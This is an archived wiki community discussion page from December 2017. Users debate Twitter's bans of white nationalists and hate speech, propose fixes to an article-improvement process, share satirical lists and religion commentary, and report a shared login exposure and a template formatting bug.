What I meant was when I posted, my post showed up on a different saloon thread. --Rationalzombie94 (talk) 13:35, 20 December 2017 (UTC)
A message on my talkpage[edit]
[14] Seems to indicate a shared Bugmenot account. I've looked into it and found this [15]. Thoughts? GrammarCommie (talk) 19:35, 18 December 2017 (UTC)
- I didn't make this account by the way, I just found the bugmenot page and wanted to alert you guys. Anonymous User (talk) 19:37, 18 December 2017 (UTC)
- I think we should comply with the idea, and not only give sysop rights but moderator privileges! —Kazitor, pending 11:46, 19 December 2017 (UTC)
- I think we should appoint the account to the RMF Board of Trustees. Spriggina (tal) (framlög) @ 01:22, 20 December 2017 (UTC)
- I just changed “my” password. You’re welcome. Anonymous User (talk) 03:34, 20 December 2017 (UTC)
- Oh, and thanks for the new sock, random stranger. Anonymous User (talk) 02:48, 21 December 2017 (UTC)
- Uh. What do you mean?—Hamburguesa con queso con un cara (talk • stalk) 03:05, 21 December 2017 (UTC)
- I am a RW sysop who noticed this exposure and neutralized it. You’re welcome. It sat apparently unused on bugmenot for months, but was still an exposure, not that anyone could have done much damage with it. Anonymous User (talk) 19:39, 23 December 2017 (UTC)
White nationalists finally getting banned on twitter[edit]
Bout time, [16]. American Renaissance and Jared Taylor's have been deleted. Anti-Fascist for life (talk) 21:25, 18 December 2017 (UTC)
- I'm sure they can take advantage of their inherent race-given magical superpowers to make a superior whites-only Twitter. --It's-a me, LeftyGreenMario!(Mod) 21:36, 18 December 2017 (UTC)
- Well @LeftyGreenMario they tried that before. Remember Gab? GrammarCommie (talk) 21:42, 18 December 2017 (UTC)
- I know. There is even an entire WIGO about it. It's going to be hard for them to explain why they can't make half-decent websites without the support of companies (and I think those companies have a ton of workers that aren't white or male). --It's-a me, LeftyGreenMario!(Mod) 21:50, 18 December 2017 (UTC)
Don't be quick to defend deplatforming on ideological grounds. There's no reason to believe that other unprofitable views will be allowed to stay. FuzzyCatPotato of the Rotted Noseblowers (talk/stalk) 22:07, 18 December 2017 (UTC)
- I agree; we shouldn't just censor everyone and anyone with dumb views. Plus, it makes it no longer a persecution complex but actual persecution, of sorts. —Kazitor, pending 22:42, 18 December 2017 (UTC)
- But therein lies the problem does it not? At what point does the toxicity of hate speech cross the line into grounds where it cannot be tolerated for the health and safety of all? GrammarCommie (talk) 22:49, 18 December 2017 (UTC)
- This kind of speech can mobilize hatred though. Do we really want that? --It's-a me, LeftyGreenMario!(Mod) 00:35, 19 December 2017 (UTC)
- Discussing free speech and censorship in terms of "safety" is problematic. This implies both that [1] censoring racism is effective at preventing racism (an empirical claim) and [2] threatening speech is inherently unacceptable (a moral one). Yet all speech that seeks to change the status quo is "threatening" -- whether from left or right. There's a reason so many fascist governments have killed leftists under the guise of "restoring order". 32℉uzzy; 0℃atPotato (talk/stalk) 01:16, 19 December 2017 (UTC)
- China does a reasonably good job of suppressing what they consider to be unsafe speech. I'm just not sure that's the example we want to follow.Bob"Life is short and (insert adjective)" 09:09, 19 December 2017 (UTC)
- These people post about non-Whites committing crime which is hate. Only Whites should be shown committing crime e.g.[17] That poster was racist. Good work Jack! Let's demonize these White bastards into oblivion through controlling their media! Dark Ages Heretic (talk) 10:36, 19 December 2017 (UTC)
- Oh, you again. GrammarCommie (talk) 11:06, 19 December 2017 (UTC)
- And worse, asking corporations and sponsor-driven media to protect us from bad words is to invoke a power that's utterly unaccountable under current law, which is not likely to change in my lifetime. - Smerdis of Tlön, LOAD "*", 8, 1. 17:17, 19 December 2017 (UTC)
- But this seems like a slippery slope argument. There is a difference between holding a ballsy unpopular view such as making a well-reasoned argument for legalizing child porn, legalizing consented incest, or advocating culling of old people and there is advocating death or rape of minorities including women. People also have their right to bar guys with hooked crosses from parties, corporations have the right to buck hateful people. That is also a type of expression. The thing we need is how to define "hate speech", which is very difficult but it's really more of a "I know it when I see it". I don't trust corporate judgement all that much but I think allowing a platform for hate screeds is problematic as it's suggestive of endorsement. And if the white nationalists get booted off Twitter, they're always free to create their own slimepool. We haven't seen Metapedia or Rightpedia or Conservapedia get booted off... yet. But in Conservapedia's case, I don't consider it hateful enough, just more stupid. --It's-a me, LeftyGreenMario!(Mod) 19:32, 19 December 2017 (UTC)
- Encouraging people to break the law is where I would draw the line. (Arguing that the law should be changed is something else.)
- But if someone has an unpopular opinion - they shouldn't be prevented from expressing it if people want to listen. On the other hand that doesn't mean you are obliged to give them a platform or that they can insist on a right to be given a platform.Bob"Life is short and (insert adjective)" 21:36, 19 December 2017 (UTC)
- Twitter is not an open free speech forum, and hasn't been for a while. They've clearly taken an editorial stance on general issues: no curse words can be tweeted at verified accounts of real people, and no hate speech (if they deem it so anyway). Since they have crossed the line from open forum to edited forum, they've put their own corporate reputation on the line for what appears on their site. I'm all for Nazis having free speech that does not incite violence, but why should a corporation financially and reputationally support it? Bongolian (talk) 22:04, 19 December 2017 (UTC)
- Claiming that a platform like Twitter is 'financially and reputationally supporting' everything written on it is part of the problem. Even with a population approaching ten billion, there aren't enough eyes to make that claim believable. And if Twitter is not an open free speech forum, where is the Twitter we actually need? - Smerdis of Tlön, LOAD "*", 8, 1. 23:19, 19 December 2017 (UTC)
- Twitter is a host that provides a free service to people, so it has its own judgement and power to decide what's appropriate and what's not. I wouldn't necessarily call it an open free speech forum. You still have to agree with terms and conditions which are subject to change. Maybe it wasn't a problem back then that "there aren't enough eyes to make that claim believable", as venues for crazy hateful stuff have always existed but we've seen Twitter mobilizing and popularizing hate before with mobbing people with death threats and stuff, and there are people who take those incidents as complaints to Twitter for better regulation of this stuff. There is a recent phenomenon with the rise of the popularity of far-right viewpoints and Twitter helped spread those ideas by letting them happen in the first place, exposing vulnerable people to rancid ideas and contributing to it, along with other complex problems such as economic strain these white people are feeling. Part of me still feels the hate speech here should be limited especially since their only intent and effect is to target and harm others. --It's-a me, LeftyGreenMario!(Mod) 23:29, 19 December 2017 (UTC)
Twitter mobs are not a phenomenon confined to any one political persuasion. There's been plenty of threatening behavior, doxxing, and the like aimed at people who blasphemed identity-politics pieties as well. From my perspective, some identity leftist dogmas ('rape culture', 'toxic masculinity' &c) are just as objectionable as white supremacism. I tolerate them, because you have to object to something before you are able to tolerate it. I would not want a corporation to decide that those viewpoints are outside of civil discourse, even if in one sense they are. My point is, when you approve of corporate censorship, you've unleashed a force you cannot control. - Smerdis of Tlön, LOAD "*", 8, 1. 01:53, 20 December 2017 (UTC)
- Honestly, focusing on educating people should be the way to go. Racists will find other means to spew their hateful pseudoscientific garbage. --Rationalzombie94 (talk) 13:38, 20 December 2017 (UTC)
- I've never said Twitter mobs occur only in one ideological wing, but those should also be restricted. I also think "educating" has a problem of backfiring. We've been trying our hardest to educate people about how blatantly irrational and stupid, how you are your worst enemy against objectivity. But the thing is Backfire effect exists. It's nice to say, "Well, let them talk and have other people say how wrong they are". Psychology seems to say, this might be counterproductive? I like to think we're persuading on-the-fence types that are reading, but maybe only if they're inclined to believe us to begin with? --It's-a me, LeftyGreenMario!(Mod) 20:09, 21 December 2017 (UTC)
Some of the discussion here suggests a common misapprehension about media: they are businesses. Newspapers, for example, tend to lay off stories that upset their advertisers, and delete language that might offend their readers. Media is almost always subject to market constraints. I imagine the bosses at Twitter don't change anything until it makes financial sense to do so. There is no other way to run a for-profit corporation: the deciding factors are monetary. This hypothesis is adequate to explain why divisive groups have lasted as long as they have on commercial social media.Ariel31459 (talk) 15:37, 20 December 2017 (UTC)
Why is it that whenever there is a hint of a possibility of free speech being slightly less than absolute, we get cries 'thats like communist china!!!' or any such authoritarian hell hole? there is a whole lot more wrong with such places that some minor tweaking wont cause any western democracy to become anywhere near such places. I'm quite happy with what could be described as hate speech being proscribed whether by twitter or by government. Living in a liberal democracy and all, i am quite confident any egregious abuses would be suitably scrutinised and condemned. i dare say most european countries already have limits on such things, and they are not quite north korea yet. AMassiveGay (talk) 21:20, 21 December 2017 (UTC)
- I've suggested that the arguments against Twitter censorship, even here, feel like a slippery slope. There's always a concern about it, but we already ban people for conduct abuse and we at RationalWiki already don't allow people to have terrible usernames and many many forums don't allow people to be racist, sexist, homophobic, ableist (like being derogatory toward autistic people). I don't see how Twitter and Facebook are held to a different standard? --It's-a me, LeftyGreenMario!(Mod) 21:31, 21 December 2017 (UTC)
- while not disagreeing with your gist, i will say the difference between facebook, twitter etc. and us is that generally policy here is decided by its users. facebook and twitter - policy is generally imposed. AMassiveGay (talk) 22:01, 21 December 2017 (UTC)
- Facebook and Twitter also mold their policy based on suggestions too, so I wouldn't say they're entirely independent from user opinion. And when I say some forums, I mean GameFAQs which strictly forbids derogatory use against autistics (see TOU). This can apply here, you have to agree to a Terms of Use to use Twitter. Twitter is giving you a platform for free and you agreed to give up some of your rights so they'll let you have a platform. Now I know you also have a right to criticize how they impose a TOU, if it's too harsh or whatever "hateful speech" is and how it's defined, and Twitter and Facebook's algorithms are shitty enough for anti-vaxxers to abuse them and try to ban their opponents for misleading claims. But I don't think the whole "it's one step to full censorship to things people don't like", I don't really buy that. --It's-a me, LeftyGreenMario!(Mod) 22:09, 21 December 2017 (UTC)
- there is also the fact that private companies or not, facebook and twitter are the public forums of the day. if you are banned from these places you are effectively silenced. people should be concerned when they decide to ban folk. it should not be arbitary, it should not be because to pander to business. it should have clear criteria. i believe hate speech should be banned and twitter are right to do so. i also believe it shouldnt be left to twitter to decide what is hate speech. see my comment belowAMassiveGay (talk) 22:21, 21 December 2017 (UTC)
- the other thing that comes to mind when discussing limits of free speech is that even the absolutists have limits - 'yelling fire in a theatre' usually gets gets thrown around. living in London, one the most multicultural cities in the world (despite brexit) such hate speech is by its nature divisive and very much 'yelling fire in a theatre'. in my mind the question is not whether twitter has the right to ban such speech but more of why are we leaving to twitter to do this? AMassiveGay (talk) 21:27, 21 December 2017 (UTC)
- I thought hate speech was defined before Twitter stepped in, so am I wrong? That hate speech wasn't defined and thus there's the argument that we shouldn't let Twitter decide what's hate speech or not? --It's-a me, LeftyGreenMario!(Mod) 23:07, 21 December 2017 (UTC)
- is it unambiguously defined? show me where. is it clearly and unambiguously defined in the US? in US law? i'm not sure that it is. AMassiveGay (talk) 23:19, 21 December 2017 (UTC)
- we are certainly not using a specific definition here but discussing generalities. AMassiveGay (talk) 23:25, 21 December 2017 (UTC)
- @AMassiveGay hate crime —Kazitor, pending 23:30, 21 December 2017 (UTC)
- those are hate crimes not hate speech AMassiveGay (talk) 00:05, 22 December 2017 (UTC)
- And hate speech is a subset of hate crime. —Kazitor, pending 00:11, 22 December 2017 (UTC)
- its not even remotely what we are discussing. AMassiveGay (talk) 00:27, 22 December 2017 (UTC)
- Welll, I was asking you that question but it seems like "no, it hasn't been defined". I'd think it'll be more of a "rules vary depending on where you go" kind of thing. You think Twitter has that power to define hate speech across the board like that? --It's-a me, LeftyGreenMario!(Mod) 00:52, 22 December 2017 (UTC)
- they clearly have the power to do so over twitter, which i have already said is unsatisfactory to me. i think its more of an issue in the US though. I think the 1st? amendment makes banning hate speech difficult. AMassiveGay (talk) 01:20, 22 December 2017 (UTC)
Current dumpster dive[edit]
For lack of a better suggestion, Baked Alaska is the Monday morning dumpster dive, the only topic with positive votes. At least it's apropos of the flaming dumpster iconography. We could really use both more people voting and more suggestions for next week's dive. Bongolian (talk) 05:15, 20 December 2017 (UTC)
- Let's be honest. RW:DUMP is) 14:15, 20 December 2017 (UTC)
- I took the challenge last weekend and completely cleaned up the Baked Alaska article. I almost feel bad that I did, though; I considered putting it up for a deletion vote after I was done. The article is now no longer simply a collection of quotes but actually has some structure and properly formatted references. It definitely needs more content, if someone has the stomach to wade through all the bullshit associated with this asshat. The dump is not dead, it just smells funny. Regards, Cosmikdebris (talk) 16:55, 20 December 2017 (UTC)
- Honestly, I like how it was originally. Not revealing the quotes in plain sight can lead to misquoting, which the article is currently doing. You use an anti-semetic tweet as a citation for Baked Alaska being pro-Trump.—Hamburguesa con queso con un cara (talk • stalk) 01:17, 21 December 2017 (UTC)
Impromptu discussion[edit]
I set up RW:DUMP in hopes of a fourth option for RW:AFD: Delete, keep, merge, or dumpster: "The topic is good, but the article is terrible". It has been under-utilized and the dumped articles haven't radically improved. Is it worth continuing RW:DUMP? If so, how should it be changed? If not, how should we handle "terrible article, good topic" deletions in the future? FU22YC47P07470 (talk/stalk) 10:52, 21 December 2017 (UTC)
- Maybe make "The topic is good, but the article is terrible" a reason for deletion that appears in the drop down menu when you delete an article. If I were deleting such an article, in the the "other/additional reasons" part I'd write, "if somebody wants to have another go at writing an article about this, that's fine." Spud (talk) 12:50, 21 December 2017 (UTC)
- Maybe end the voting thing and just make it a list of pages. I also like Spud's idea.) 13:47, 21 December 2017 (UTC)
- The idea for a dumpster is good but the page itself needs a little work. I've always been confused at why pages are rated there for voting. What does a positive or negative tally even mean? Perhaps an abstract of the articles can be added, instead of generic comments like "needs to be organized." This could better help guide people to articles they would like to improve. Regards, Cosmikdebris (talk) 13:57, 21 December 2017 (UTC)
It almost might be simpler to just have a chronological list of articles that need to be improved -- people add articles and eventually we get to those articles? Herr FüzzyCätPötätö (talk/stalk) 21:53, 21 December 2017 (UTC)
- I just don't agree with the voting system because if people have a problem or even if they're neutral, they need to spend some time also explaining about their vote. Kind of then defeats the point of a voting system. It makes more sense in a WIGO to not necessarily explain why you voted, but for a RW, it's not as helpful because the content is something we have control over. I agree with Cosmikdebris here. The concept of Dumpster is good, but I still fear people will just ignore it. But again, there is the off-chance that Dumpster Drive will help one article or so. But again, if Dumpster Drive is discontinued, I won't really miss it, given it's a souped up Category:Articles needing expansion, that's how it feels like sometimes. --It's-a me, LeftyGreenMario!(Mod) 01:17, 22 December 2017 (UTC)
- Yeah. Get rid of the voting since nobody understands what it means. Just have a list of articles nominated for improvement with most recently nominated ones at the bottom and work through them in order. Spud (talk) 06:39, 22 December 2017 (UTC)
- I don't think it would be terribly minded much if you just selected a less than optimal article yourself without the ritual of polls and the like. - Smerdis of Tlön, LOAD "*", 8, 1. 16:57, 22 December 2017 (UTC)
This is going to sound weird[edit]
When I saw the name, I thought it was the dessert. Though part of me knew it was not, but considering I never heard of it this way, that is why I thought it was the dessert. --Rationalzombie94 (talk) 01:52, 25 December 2017 (UTC)
- The word "impromptu" makes you think of desert? GrammarCommie (talk) 01:59, 25 December 2017 (UTC)
- There is a dessert called a Baked Alaska. I glanced at the titled before clicking the link. --Rationalzombie94 (talk) 14:23, 25 December 2017 (UTC)
Solstice holydaze[edit]
What's up with that? —Kazitor, pending 01:06, 21 December 2017 (UTC)
- Yeah. What the hell?—Hamburguesa con queso con un cara (talk • stalk) 01:14, 21 December 2017 (UTC)
- And it looks like there isn't even one for the June solstice. —Kazitor, pending 01:31, 21 December 2017 (UTC)
- There is usually a 'druid wannabes hanging round Stonehenge' snippet on the UK news that time of year.
- Otherwise - establish a Campaign for Summer Solstice Holidays (not to be confused with COSHH) and annoy the religious doom mongers. Anna Livia (talk) 12:01, 21 December 2017 (UTC)
Pending a replacement[edit]
Something about the sun being in its southernmost position. Get rid of the time cube stuff. Thoughts/ideas/suggestions? —Kazitor, pending 23:23, 21 December 2017 (UTC)
- Get rid of the timecube stuff (I assume that's the random insults thing in red, white and blue in the middle), have a snowflake icon on the left and a sun icon on the right. Then you're done. Spud (talk) 06:35, 22 December 2017 (UTC)
Don't forget to celebrate the Earth's perihelion on January 3 as well[18]. --Gospatric (talk) 09:50, 22 December 2017 (UTC)
Something tells me this will be the slippery slope argument for U.S gun control[edit]
Though I'm not sure of it's verdict considering ShiningSwordofThoughts (talk) 03:35, 21 December 2017 (UTC)
- since few people in the UK get hard ons from firearms, no one here gives a shit what an american gun trade magazine thinks. AMassiveGay (talk) 10:28, 21 December 2017 (UTC)
- My dude, the slippery slope is moving the other way. The Assault Weapons Ban died in what, '04, '05? Nothing real or meaningful since then with respect to controls on firearms. The presumption that if we take one step we will fall down a hill is obviated by the fact that the NRA has turned any attempt at control into an impossible uphill climb. Semipenultimate (talk) 16:06, 21 December 2017 (UTC)
- "...considering to ban...". That wording really bugs me. X Stickman (talk) 21:17, 21 December 2017 (UTC)
- Honestly I'd personally disgree with UK gun control,and maybe prefer Europe style gun control IE: Germany. I wouldn't be into general caliber restriction. Also got any British gun owners on Rational Wiki. ShiningSwordofThoughts (talk)
- Are there not several aspects - 'legislation involving people and guns', 'the cultural aspects of having and using guns' and 'what people think guns are for' - and it is the combination which can be of most significance. (Most people own forks - but few consider using them as weapons.) Anna Livia (talk) 17:02, 22 December 2017 (UTC)
Homeopaths Scientists create an ultradilute quantum liquid[edit]
An ultradilute quantum liquid made from ultra-cold atoms. I feel I'd have put this on WIGO.
They come too late -homeopaths are calling, and I'm imagining an enterprising one will sell stuff of that kind-. Panzerfaust (talk) 13:19, 16 December 2017 (UTC)
So do Republicans just think when it's said "Black people can't be racist." that that just defeats acual racism[edit]
I mean their definition of black people being racist is very different from acual racism right? ShiningSwordofThoughts (talk) 15:35, 20 December 2017 (UTC)
- It's a little unclear what you are asking. I think that republicans is too large a group to expect them to think the same about anything. I know of some republicans, for example, who think they should be paying higher taxes!Ariel31459 (talk) 15:57, 20 December 2017 (UTC)
- Racism is more complex than just prejudice, but prejudice should not be dismissed. If I could beat that sentence into the heads of every right wing idiot, we'd all be spared so much pain. ikanreed 🐐Bleat at me 17:08, 20 December 2017 (UTC)
- The OP appears to be about some Spanish speaking cultures having little regard for others. This is a world I don't have a window to look into. I figured it might exist, but I don't know how stuff breaks. OTOH, racism is simply prejudice on the basis of race or ethnicity, without regard to merely local histories, and that's the end of the matter. Anyone telling you different is selling snake oil. - Smerdis of Tlön, LOAD "*", 8, 1. 02:05, 22 December 2017 (UTC)
- Stuff like lineage tends to be tied up in racism a lot. 1/32nd rule, for example, or 18th century France's racial hierarchy that invented words like "Quadroon" and "Octaroon" while classifying people before the law. As far as Hispanics go, there were different classes depending on how much Spanish blood someone had in them. You even get Hispanic White Nationalists who try to play up the Spanish identity as a European nation, and because Spanish doesn't mean colored.-PsychoGecko (talk) 10:53, 25 December 2017 (UTC)
Are these still relevant joke videos?[edit]
,and ShiningSwordofThoughts (talk)
RZ94's Official Bullshit Scale (Patent Pending)[edit]
This is the official bullshit scale I came up with! :)
Level 1[edit]
This usually consists of anti-vaccine people, anti-immigration people and Gun Rights activists.
List of Offenders[edit]
Level 2[edit]
This consists of general racists (Individuals/minor groups), Creationists, 9/11 conspiracy theorists and militia movements (low level internet activity). Medical quacks are not forgotten.
List of Offenders[edit]
- Institute for Creation Research
- Bob Jones University
- TRACS
- Various racist YouTube channels (ex. Nordic Rock and Roll)
- Militias
- Doctor Oz
- Alphabiotics
- Georgia Christian University
Level 3[edit]
This level consist of die hard, violent racists; major conspiracy theorists, Church of Scientology, and terrorists
List of Offenders[edit]
Let me know what others I should add. --Rationalzombie94 (talk) 23:16, 21 December 2017 (UTC)
- Reminds me of
{{hinge}}. —Kazitor, pending 23:19, 21 December 2017 (UTC)
- How the hell are anti-vaxxers only Level 1, especially below random racist Youtube channels? This is from a "how much damage they can do" stand point, not how morally rancid or intellectually bankrupt these are... the scale can be based on any of these, but I'll assume just the damage part. I'd argue they're even more of a threat than terrorists given the extreme unlikelihood you'll die from a terrorist attack. I wouldn't classify them exactly under ISIS or Neo-Nazis on a "vileness" or "violence" scale but on the scale they're poised to hurt humanity, they're going to be pretty high. I'll also rank global warming deniers high too for a similar reason: far less ideologically rancid as Neo-Nazis or ISIS but can kill much more people and cause more property damage in the long term if they have power. As far as I know, global warming deniers DO have power, in the U.S.. Anti-vaxxers, somewhat given how in many countries, they're successful at having disease return. --It's-a me, LeftyGreenMario!(Mod) 00:31, 22 December 2017 (UTC)
- See your point. Some of it was guess work --Rationalzombie94 (talk) 02:45, 22 December 2017 (UTC)
- It does seem a bit arbitrary the way you've described it. Perhaps a 2-dimensional scale would be better: scale 1 could be disconnect from reality (with a noted high point at around Time Cube, and scale 2 could be real or hypothetical number of deaths/injuries, with authoritarianism (Hitler, Stalin, and Mao) and possibly Climate change denial at the extreme. Bongolian (talk) 07:54, 22 December 2017 (UTC)
- Pretty sure NRA and Tea Party deserve to be in the general racist's category at least. They sunk a lot of money into those Confederate flags. -PsychoGecko (talk) 10:36, 25 December 2017 (UTC)
Notice[edit]
Go ahead and edit. My assessment was total shit. Even rename the scale if you feel up to it (everybody) --Rationalzombie94 (talk) 02:45, 22 December 2017 (UTC)
Vote: Who has the best userpage on Rationalwiki?[edit]
the Winner is announced. has already ended. (refresh) —ClickerClock (talk) 06:04, 26 December 2017 (UTC)
- The winners are: DiamondDisc1 and Stabby the Misanthrope! —ClickerClock (talk) 01:52, 1 January 2018 (UTC)
Rules
- You cannot submit yourself.
- Add the user to the poll.
- Ping the user you entered.
Poll[edit]
@DiamondDisc1 —ClickerClock (talk) 12:21, 23 December 2017 (UTC)
- It’s clearly me. (Yes I am joking):02, 23 December 2017 (UTC)
- I have amazing Mario facts that Nintendo doesn't want to let you know. :P --It's-a me, LeftyGreenMario!(Mod) 21:21, 23 December 2017 (UTC)
- On RationalWiki, we are all losers. Radioactive afikomen Please ignore all my awful pre-2014 comments. 23:27, 23 December 2017 (UTC)
- Mine is at least better than my Wikipedia homepage, which has been around since like 2003 or so and is fairly Web 1.0. (Which is a good thing.) - Smerdis of Tlön, LOAD "*", 8, 1. 02:25, 24 December 2017 (UTC)
I think the user page of @Weaseloid is pretty neat. (Too bad self-nomination is not possible. I'm really proud of my page.) Nerd (talk) 19:47, 24 December 2017 (UTC)
- Ah, pff, your page has a ton of videos embedded in there. --It's-a me, LeftyGreenMario!(Mod) 19:52, 24 December 2017 (UTC)
- I'm just gonna assume by 'pff' you mean 'pretty fascinating and fantastic'. Yep. Carefully chosen and highly educational materials. Nerd (talk) 22:17, 24 December 2017 (UTC)
- Is mine the best? Boredatwork (talk) 12:22, 25 December 2017 (UTC)
- @Boredatwork Nerd (talk) 14:29, 25 December 2017 (UTC)
- @Stabby the Misanthrope also has a visually pleasing user page, in my humble opinion. Nerd (talk) 14:29, 25 December 2017 (UTC)
You've almost convinced me to put some fancy CSS all over my page. Almost. Maybe I could try adding to it too? —Kazitor, pending 06:42, 26 December 2017 (UTC)
- I have fancy CSS on my userpage. Look at that poll. I'm not even on there even through I have rainbows on my userpage. —ClickerClock (talk) 09:25, 26 December 2017 (UTC)
Merry Christmas to Rationalwiki and to all a good skepticism![edit]
We shall ring in the new year with more satire and pseudoscience debunking! --Rationalzombie94 (talk) 05:15, 25 December 2017 (UTC)
[edit]
ShiningSwordofThoughts (talk)
- Archiving timestamp, idk how long ago this was posted. Christopher (talk) 19:09, 26 December 2017 (UTC)
The Bible is more violent than any horror or disaster film I have ever seen in my 23 years of life[edit]
Christian watchdog groups complain about violence on TV and work to censor
free speech "immoral" content. But they force the bible on everyone. Each chapter in the bible could be a plot basis for a horror or disaster movie.
The Great Flood[edit]
Much like the movie 2012 starring John Cusack, a global flood killing billions of people
Birth of Jesus[edit]
Could be a slasher film like Nightmare on Elm Street (there might be better examples) considering King Herald had all baby boys slaughtered.
Ten Plagues of Egypt[edit]
Note- each plague could be its own movie.
- 1st plague (water turned to blood, fish are killed)- Environmental disaster (can't think of a movie)
- 2nd plague (frogs)- Alfred Hitchcock's The Birds (except with frogs)
- Plagues 3-6- Contagion (Movie)
Note- Can't think of other movies at this point, go ahead and add.
Battle of Armageddon[edit]
The movie Platoon, on steroids. --Rationalzombie94 (talk) 13:46, 24 December 2017 (UTC)
- You forgot to mention other things mentioned in the BoR, and especially who sends all that stuff and is described as "all-loving". Panzerfaust (talk) 14:30, 24 December 2017 (UTC)
- @Panzerfaust The Bible is quite Orwellian isn't it? GrammarCommie (talk) 15:37, 24 December 2017 (UTC)
- Very much so. I can understand why Fundies hate so much people who use their brains to see the sheer amount of BS in said book as well as how really is Gawd. The only thing that is missing there is Him killing El, Asherah, and others who lost the game. Panzerfaust (talk) 18:35, 24 December 2017 (UTC)
God[edit]
Crazy
Dicktator dictator who murders innocent people, much like Adolf Hitlter! --Rationalzombie94 (talk) 15:43, 24 December 2017 (UTC)
- I think comparing a man who actually murdered millions of people to a work of fiction in order to make a point is in rather poor taste. Christopher (talk) 16:23, 24 December 2017 (UTC)
- Well, you hear so much about Nazis that it came to mind. Maybe Stalin? The Bible is fiction anyways. --Rationalzombie94 (talk) 18:39, 24 December 2017 (UTC)
- In all likelihood any authoritarian state with heavy emphasis on ideological purity and excessive use of propaganda would be a suitable comparison. GrammarCommie (talk) 19:39, 24 December 2017 (UTC)
Original Sin[edit]
As shown in the picture, it can be compared to North Korea.) 16:30, 24 December 2017 (UTC)
- As I said above, it's in very poor taste to compare fiction with mass murderers to make a point. Christopher (talk) 18:02, 24 December 2017 (UTC)
@User:Bigs, why not say social satire is wrong? I try to use insults as little as possible, however, why not just say all satire and parodies that exist are in bad taste. To me, the way you worded it implys you are against free speech. Sorry but that is what you are implying (my view). --Rationalzombie94 (talk) 01:58, 25 December 2017 (UTC)
- @Rationalzombie94 How did Bigs say any of that? — Unsigned, by: Christopher / talk / contribs
- I never said anything along the lines of:30, 26 December 2017 (UTC)
Treatment of women[edit]
Women are unnamed and generally treated a little more than objects to advance the plot, to give birth or part of economic/sex transactions. Also, it is always the woman who is infertile. It also reminds me of The Handmaid's Tale, a TV series which also takes the Bible hyper literally. --It's-a me, LeftyGreenMario!(Mod) 18:00, 24 December 2017 (UTC)
- I remember a Fundie (yes, he's a Fundie since it's someone who talks about an all-loving God who did the last sacrifice sending His son to die for our sins, but at the same time telling that if you don't follow the latter you'll go to Hell) saying that women aren't equal to men due to both biological (this at least is true) and psychological differences and that equality is of the type "in a marriage man protects woman and the rest of the family", even if at least he was against domestic abuse. I'd like to know the opinion of female. Panzerfaust (talk) 11:41, 25 December 2017 (UTC) contributors
- I can even argue that even the biological differences can be worked around so this God Dude... you'd expect him to know better, huh? Even if he punishes me for criticizing his logic, it's not going to make him seem smarter. And there's the whole idea that this God person has to be male, I mean, why male? Females are the one who give birth, God should be female. Maybe that's my woman in me speaking. And there's the whole menstruation thing. --It's-a me, LeftyGreenMario!(Mod) 20:42, 26 December 2017 (UTC)
- I have read about the Gnostic Christian faith and they have both male/female deity. But fundies call them Satanists. --Rationalzombie94 (talk) 14:07, 28 December 2017 (UTC)
A wiki / database of company ethics?[edit]
Hello RW
Does anyone know of a database or wiki that documents company ethics? (and apologies if this isn't the right place to ask)
Thanks, Winterstein (talk) 22:30, 25 December 2017 (UTC)
Midday nap[edit]
We should have a nap in the middle of the day for our entire lives, like in Sp:09, 26 December 2017 (UTC)
- Zzzzzz What were you saying?-💎📀1️⃣ (talk) 04:30, 26 December 2017 (UTC)
- Have a Biphasic sleep cycle instead of a monophasic one? I don't know. Which is healthier? Even if both are healthy, how will the corporate and job world support such a sleep schedule?—Hamburguesa con queso con un cara (talk • stalk) 04:57, 26 December 2017 (UTC)
- I support almost any system that lowers my blood pressure. GrammarCommie (talk) 05:02, 26 December 2017 (UTC)
- @CheeseburgerFace It works in the countries it happens in. The hours are different from ours to factor in the midday nap.) 05:28, 26 December 2017 (UTC)
- I'm against the idea. A midday nap would mean I'd have to get out of bed earlier. Boredatwork (talk) 22:55, 26 December 2017 (UTC)
As an honorary Spaniard I feel I should mention that nowadays very few working people actually take siestas.Bob"Life is short and (insert adjective)" 06:53, 28 December 2017 (UTC)
Quotebox removing linebreaks[edit]
Quotebox removes lines when only two items are present:
thing 1
thing 2
Compare with regular behavior:
thing 1
thing 2
Quotebox does not when three are present:
thing 1
thing 2
thing 3
Compare with regular behavior:
thing 1
thing 2
thing 3
Any idea what's going on? Sir ℱ℧ℤℤϒℂᗩℑᑭƠℑᗩℑƠ (talk/stalk) 04:14, 27 December 2017 (UTC)
- It's not putting the paragraph tags around the first and last lines. Kinda hacky solution: put a break before or after (or both)
line break before this
regular
regular
line break after this
line break before this
line break after this
- Makes ugly padding, unfortunately. Applying some styles to
.letter pcould possibly fix that. —Kazitor, pending 04:34, 27 December 2017 (UTC)
- It's a bug in the template. I always do this:
{{quotebox| text goes here }}
- The bug also produces uneven spaces between lines.—Hamburguesa con queso con un cara (talk • stalk) 06:41, 27 December 2017 (UTC)
- Why is this even here? This belongs in RationalWiki:Technical support. Also this isn't a glitch. The wikitext to HTML thing in Mediawiki just outputs it oddly when it comes to templates. —ClickerClock (talk) 09:39, 27 December 2017 (UTC)
Gematria[edit]
Is anyone interested in helping me update the section on gematria. The current section is oversimplified in regards to how it's being practiced these days. — Unsigned, by: Antigem / talk / contribs
- I suspect, my friend, that even with your grains of knowledge, you know more about it than any of the regulars here. Things like Kabbalah (spelling?) etc are rather obscure, and I guess it's outside the usual range of interest of the average RationWikier. I know someone who's into it, but sadly I have no idea what she's on about most of the time. Sorry! Boredatwork (talk) 23:18, 27 December 2017 (UTC)
As a new user I'm still feeling my way around. I know Kazitor has offered to help. Now I have to figure out how to set up the talk page to discuss it. Lack of time with an upcoming obligation, today or tomorrow I'll provide more detail. For starters, I want to make a distinction of gematria in the classical sense, as is historically applied. Words = numbers. Look for significance. In the past few years it has turned into a lot of superconspiracy with so many new non-words =numbers elements it's impossible to list them all here. Dates, football statistics, GPS coordinates, prime numbers, blah, blah, blah. It's usage is mostly in the Freemasonsdidit kind of way.
I may have spread overstepped my bounds by editing out the previously existing reference to linguistics this morning. I contend that not only does linguistics not help, the opposite of proving that gematria, even in the "classical" form, doesn't work. Homonyms? Direct antonyms Guilty=94, Innocent=94. Then add in multiple cipher cross matching, the pattern recognition and other add ons in recent years, it's now approaching That's not even wrong!. So yeah, I'm firmly biased against it. And to keep the wiki clean I, as a newbie, welcome rational discussion before major overhaul. I can snark with the best of them, but can save that for my blog.
So anyone who wants to help, "reign me in" when I step on toes. Looking forward to discussion with people that can put together a logical argument. And Kazitor...tips on setting up the discussion page? — Unsigned, by: Antigem / talk / contribs
